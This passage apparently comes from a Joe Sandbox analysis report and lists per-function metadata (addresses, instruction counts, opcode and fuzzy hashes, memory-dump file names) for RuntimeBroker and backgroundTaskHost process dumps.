                                                                                                              • Instruction ID: 99357cb801bf5a7cc56a1078f38464fdc2cef917cac2e42ee7197cc5aa2e4296
                                                                                                              • Opcode Fuzzy Hash: 0613a7e3c078aa6166850929b98cd69ef85dad92d03adef61d45f6422dc8c471
                                                                                                              • Instruction Fuzzy Hash: 46410416F1C6990AE308F7B860A9AFC7791EF89329B1546BAD04EC61E7DD1868818281
                                                                                                              Function 00007FFD9B7D0960 Relevance: .1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c4255f08aa6773782e7d2397dd1b6cd3ff65e8eb450539e001132177cb85df29
                                                                                                              • Instruction ID: 94aafce7d08da926a415a900c00593b18a2589bec79b814b100a6f27df67375c
                                                                                                              • Opcode Fuzzy Hash: c4255f08aa6773782e7d2397dd1b6cd3ff65e8eb450539e001132177cb85df29
                                                                                                              • Instruction Fuzzy Hash: B1310912F1CA5D0FE758F66C746AAB873C6EFC8365B5546BAE40EC31E7DC18AC414280
                                                                                                              Function 00007FFD9B7D0998 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 75705b75a0e622ed4f0a6e81b87bd81734e9d6c743ff7a030c4794f121047f1e
                                                                                                              • Instruction ID: 012b8047699f1f6cf611616fbe6e7330ef608e8b0de259d257f9d537779f9cab
                                                                                                              • Opcode Fuzzy Hash: 75705b75a0e622ed4f0a6e81b87bd81734e9d6c743ff7a030c4794f121047f1e
                                                                                                              • Instruction Fuzzy Hash: D721FC20F19A1D0FE758E76C946A77976C6EFD8351B5502BDE40EC32F6DD18AC414281
                                                                                                              Function 00007FFD9B7D11A1 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05a68afa6f71b823817782456a8800b9cdc964da62c8fb56d43b51e5ec6f45e5
                                                                                                              • Instruction ID: d710bbd16dd851c7bbae960e1e2a59b3abdf94bc4f85237ce7c85337ec0fe405
                                                                                                              • Opcode Fuzzy Hash: 05a68afa6f71b823817782456a8800b9cdc964da62c8fb56d43b51e5ec6f45e5
                                                                                                              • Instruction Fuzzy Hash: 3A319330A0D64E8FDB46EB64C8649B97BF0EF96340F0546BBD009D72F2DA39A944CB50
                                                                                                              Function 00007FFD9B7D0C25 Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5a75dae402eded833b6b717ae9dfad9162d3ec91cf26db18156d53c56a66070e
                                                                                                              • Instruction ID: e09d5de10409d928f6969a7b1ce751835427d048879ea2252dd0e57be528acd3
                                                                                                              • Opcode Fuzzy Hash: 5a75dae402eded833b6b717ae9dfad9162d3ec91cf26db18156d53c56a66070e
                                                                                                              • Instruction Fuzzy Hash: 4F210635A0D78D8FE721DBA4C4342EC7BA0EF81354F4647BBC0488B1E2D9382689CB51
                                                                                                              Function 00007FFD9B7D2D1E Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db64c34fbbba1f0c99e9a0d22a350861581b5332b57be307ef0fc18218a217f6
                                                                                                              • Instruction ID: b082fb950f59e28b5a5422c46cf685585ae6fed36980775b56c76d50c287d456
                                                                                                              • Opcode Fuzzy Hash: db64c34fbbba1f0c99e9a0d22a350861581b5332b57be307ef0fc18218a217f6
                                                                                                              • Instruction Fuzzy Hash: 12210330A1960D8FDBA4DB44C460BAD73A1FFD4340F5546A9D00ED72B1DE39AE85DB41
                                                                                                              Function 00007FFD9B7D1330 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7e6d9a58630a6bf498a63300a88ff194c334d24a20a7f4fc75e7d54b4f1d7567
                                                                                                              • Instruction ID: 17f5476ba9001d0954ddb6d4217ac638d1a2c9ec2947518c53904860a98ee6ae
                                                                                                              • Opcode Fuzzy Hash: 7e6d9a58630a6bf498a63300a88ff194c334d24a20a7f4fc75e7d54b4f1d7567
                                                                                                              • Instruction Fuzzy Hash: 8F11C631F0D65E4BE7A4EB6898257B9B1D2EBC8390F0507B9E40DD32E6DD1C69484381
                                                                                                              Function 00007FFD9B7D18EC Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab858236e7dff6e686aef2ac31bdfe2cfb79e6b0048f523e0f1a536342c05c0f
                                                                                                              • Instruction ID: bcde1fe6af7c7879108159fb4ffe9971d8819e2c058f75e9790a653343f3f49b
                                                                                                              • Opcode Fuzzy Hash: ab858236e7dff6e686aef2ac31bdfe2cfb79e6b0048f523e0f1a536342c05c0f
                                                                                                              • Instruction Fuzzy Hash: 2D113721F0A65E4AE7B4E7988874BB83291EFC4350F5713B6D80DD35F1DD286A888641
                                                                                                              Function 00007FFD9B7D0C38 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aace66a017e91b5610a8a00f03b91e6661faeee7936badff18caa8af17f624eb
                                                                                                              • Instruction ID: 363c912dc5cff404c6dd106ebaf845b208a92347b27bde86149511a5d19a2729
                                                                                                              • Opcode Fuzzy Hash: aace66a017e91b5610a8a00f03b91e6661faeee7936badff18caa8af17f624eb
                                                                                                              • Instruction Fuzzy Hash: E611C235A0D78D8FE702EBA4D4642DD7BB0EF82215F0646B7C048DB2E2D5341A49C790
                                                                                                              Function 00007FFD9B7D0C48 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1495ee3e950b024d4c70503b42c896eff01ec7031377b4df69616dc4375a5cc3
                                                                                                              • Instruction ID: db955241b7974b3e76b68f69fa22f73ff266f07e9d7c26ee9567becd95850106
                                                                                                              • Opcode Fuzzy Hash: 1495ee3e950b024d4c70503b42c896eff01ec7031377b4df69616dc4375a5cc3
                                                                                                              • Instruction Fuzzy Hash: 83019E35A0D3888FD702EBA4C45469D7FB0AF42214F1642EBC044DB2A2D9346A48CB90
                                                                                                              Function 00007FFD9B7D19F9 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction ID: 6e9f509c2b7eb204ae8c55cd300115a644c99b2d27265a28f71a6e009c48b042
                                                                                                              • Opcode Fuzzy Hash: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction Fuzzy Hash: F9F01930A4961F8AEB74EA54C860BF83261EB90350F0203B5C40ED36B1DE386AC68A40
                                                                                                              Function 00007FFD9B7D0C50 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfb9236625afcd03832755139703c08164f7770fe24a303393cefe25933f4656
                                                                                                              • Instruction ID: 0600b4e056964db2b0c71d5e0cbc919d942fcda564f08651d0d1d93059d050e3
                                                                                                              • Opcode Fuzzy Hash: cfb9236625afcd03832755139703c08164f7770fe24a303393cefe25933f4656
                                                                                                              • Instruction Fuzzy Hash: C9018F34A0D3899FD702EBA4846469D7FB0AF42304F1542E7C448DB2A6D9385A48C741
                                                                                                              Function 00007FFD9B7D43C6 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction ID: e991afeb2dcb95815ba418e7b143e005ee11630d73b106524b10b22e65bf6d4e
                                                                                                              • Opcode Fuzzy Hash: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction Fuzzy Hash: 32E0ED20F0A51E47FBA49244DC60BA97264EB94340F1553B8D50EA32E1CD38AF498755
                                                                                                              Function 00007FFD9B7D0B95 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction ID: 8c46180f204861ed18d157686fb3b48b30d9134df8777a1a4ede14aa2cfc3dce
                                                                                                              • Opcode Fuzzy Hash: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction Fuzzy Hash: 81D0A730219A4E4FC600B778C88A4147BA0FB4F210BC511E5E008C7576C51848598700
                                                                                                              Function 00007FFD9B7D06AD Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35a49160e60ee853f605c8054370c066b52b2d658542092c8daf0daae25e67b6
                                                                                                              • Instruction ID: 548356b21c8600789c793b61d55f6eef9823efeed536f06ab743f2976d2a8b6f
                                                                                                              • Opcode Fuzzy Hash: 35a49160e60ee853f605c8054370c066b52b2d658542092c8daf0daae25e67b6
                                                                                                              • Instruction Fuzzy Hash: 10C08C00F0B71F00E43031EE54760ACB100CBC4AA0FD32333C00D400B19C0E22CD814A
                                                                                                              Function 00007FFD9B7D34ED Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c14cdab702897ef6ed091c2300ef667f4bf55b6e8b8e91eaddc1b0093796e1f
                                                                                                              • Instruction ID: 49c4423727faf969a3162f4cf8c853e4b1e4a74a4f33222503fb3720bf506e19
                                                                                                              • Opcode Fuzzy Hash: 9c14cdab702897ef6ed091c2300ef667f4bf55b6e8b8e91eaddc1b0093796e1f
                                                                                                              • Instruction Fuzzy Hash: 23D0C714F0EA5D45F32BD754247077D65126F80264F8506F5D42D565EDCE4C27061392
                                                                                                              Function 00007FFD9B7D0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction ID: cffcb1c56a46e120715c0659bc65cb5b404b9aeaefca6f496f4eb7501462d633
                                                                                                              • Opcode Fuzzy Hash: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction Fuzzy Hash: 38C08C305118088FC900E72CC88490432A0FB0D320BC602D0E00DC7170E21A9CC5C701
                                                                                                              Function 00007FFD9B7D4248 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1b021ed0bd093acc62298565e615ad0951d9354004b95ed0d14022ab4e79ae34
                                                                                                              • Instruction ID: 67382e59261267c38efc3aef5eea9e72d616d2ce38cfad863cc3e5caef2495c9
                                                                                                              • Opcode Fuzzy Hash: 1b021ed0bd093acc62298565e615ad0951d9354004b95ed0d14022ab4e79ae34
                                                                                                              • Instruction Fuzzy Hash: 0CC01214F0A74D46EEA4A6B480351BD30819FC4790F422774D40EC71F2DC1C2A448680
                                                                                                              Function 00007FFD9B7D34C7 Relevance: .0, Instructions: 10COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d23c24eb2e0f6169af831cf1fb01836c900d34092c1538518676a5a752ca36b
                                                                                                              • Instruction ID: afd38c61951f25590c85f52a1e2b3a2539b7b2844f89f45c4528b3761af59c3f
                                                                                                              • Opcode Fuzzy Hash: 2d23c24eb2e0f6169af831cf1fb01836c900d34092c1538518676a5a752ca36b
                                                                                                              • Instruction Fuzzy Hash: AAC08C00F19C5A02F32AA604243077F44025F80208FC505F0E02E867DECC0C6A022283
                                                                                                              Function 00007FFD9B7D06D0 Relevance: .0, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction ID: 48a6ed3a487d6b6767643713b3cfe1eb0bc7ab6bd9a4c4a9e294edf6cec9e79e
                                                                                                              • Opcode Fuzzy Hash: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction Fuzzy Hash: 54B01200D5750F00E42431FA08B70647040DBC4180FC21370D40C401B1984D169C1242

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B7F0D78 Relevance: .3, Instructions: 257COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf0b211f49cadf8a6721657cdb48fafb9eb8e93934d9446a2822c40291466a04
                                                                                                              • Instruction ID: c1de063b649c613bf40c266c6d16267f3dc6d891ec48b371bad392df512b07ab
                                                                                                              • Opcode Fuzzy Hash: bf0b211f49cadf8a6721657cdb48fafb9eb8e93934d9446a2822c40291466a04
                                                                                                              • Instruction Fuzzy Hash: 90910271B19A8D8FE788DF688869BE97FE1FB95314F0002BAD049C73E6CA781451C741
                                                                                                              Function 00007FFD9B7F08D0 Relevance: .2, Instructions: 160COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 045206b25b0cf619807c3b53703445ff31ce340527463a78fd741b6deaec6e19
                                                                                                              • Instruction ID: e80ec66b1c4662561570d086b03fb52688312a8ff221df99ebb21cd681fecd40
                                                                                                              • Opcode Fuzzy Hash: 045206b25b0cf619807c3b53703445ff31ce340527463a78fd741b6deaec6e19
                                                                                                              • Instruction Fuzzy Hash: F3414612F1D6990EE308F7B864A96FC7B91DF89329B1545BBE04EC71E7DD08A8818285
                                                                                                              Function 00007FFD9B7F0960 Relevance: .1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c023fcff3b699d077949b2d0f97b17da3a47878c339be3d39c04102c525e2d5d
                                                                                                              • Instruction ID: 3ef156aee70b33e46f1ce84d153ebba126c1362e664f2ae8fa60880cb54f4a9d
                                                                                                              • Opcode Fuzzy Hash: c023fcff3b699d077949b2d0f97b17da3a47878c339be3d39c04102c525e2d5d
                                                                                                              • Instruction Fuzzy Hash: 2F312D11F1CA5D0FE358F66C646A6F877D1DF88325B1545BAE40EC31E7DC18AC4142C9
                                                                                                              Function 00007FFD9B7F0998 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 55129fe4be3b3df83f795dad2e8129ee533bb002224fa4be62b3a04a6a93b1fe
                                                                                                              • Instruction ID: de26987be07a22c9a455e07df3a7b6a64e41a5a2a4e3b1e7878f870181558327
                                                                                                              • Opcode Fuzzy Hash: 55129fe4be3b3df83f795dad2e8129ee533bb002224fa4be62b3a04a6a93b1fe
                                                                                                              • Instruction Fuzzy Hash: 09212920B29A1D0FE798F66C946A6B57AD2EF98315F4101B9E40EC32F6DD18EC418289
                                                                                                              Function 00007FFD9B7F0C25 Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d337c667fc68a0511d3fd1f6e8fa63be9a8f681457da1e3809f52ea5203f0c0
                                                                                                              • Instruction ID: ed7c6c16c523e79dd33071dbda10a320c0c5bcc56e16a4f3b65510cfc43fea5f
                                                                                                              • Opcode Fuzzy Hash: 2d337c667fc68a0511d3fd1f6e8fa63be9a8f681457da1e3809f52ea5203f0c0
                                                                                                              • Instruction Fuzzy Hash: 6B21D571B0D78D8FE721DFA488646EC7FA0EF42314F1646B7D0448B2E2DA382645CB95
                                                                                                              Function 00007FFD9B7F2D1E Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 55c081355bcc84718266062b56d5214841c0c59bcf031ca137963575f1b7c877
                                                                                                              • Instruction ID: 6e608fa4066438a497b3ab74d52933644dda9fda2d74cc0a55e3e083ef2f44b6
                                                                                                              • Opcode Fuzzy Hash: 55c081355bcc84718266062b56d5214841c0c59bcf031ca137963575f1b7c877
                                                                                                              • Instruction Fuzzy Hash: 7D214830B0990D8FDBA4DB44C460BA977A1FF94304F9541A9D00ED72B1CE35AEC5DB85
                                                                                                              Function 00007FFD9B7F1330 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2481098f12af5d40a64240396f7c88b43d0ce95c60fabf980847dbe2f25e26bd
                                                                                                              • Instruction ID: fc674d183ef3de8afb1e8c07bdd9a4c27ff53d948b2ff58ac9b3d3391a1df860
                                                                                                              • Opcode Fuzzy Hash: 2481098f12af5d40a64240396f7c88b43d0ce95c60fabf980847dbe2f25e26bd
                                                                                                              • Instruction Fuzzy Hash: A3117331F0D65A4BE7A4E76898657B979D2EF88350F0503B5E40DC32F6DD19A94043C6
                                                                                                              Function 00007FFD9B7F18EC Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6246985b57183972333230dff825af188b0e4f3aefa5c0f7c7029f10156ee3f5
                                                                                                              • Instruction ID: cc67e051d01ba21ce91901ab4fc2cbd93b6f912a75d486259d7ee0841c25ef3e
                                                                                                              • Opcode Fuzzy Hash: 6246985b57183972333230dff825af188b0e4f3aefa5c0f7c7029f10156ee3f5
                                                                                                              • Instruction Fuzzy Hash: 1C113321F0E65E4AE7B4EA988864BB83691EF45310F5702B6D40DD76F2DD286A4046C5
                                                                                                              Function 00007FFD9B7F0C38 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4783662381dcd71a9815db07534482895ac7faa8ac6bb84c38932820ab62e8cc
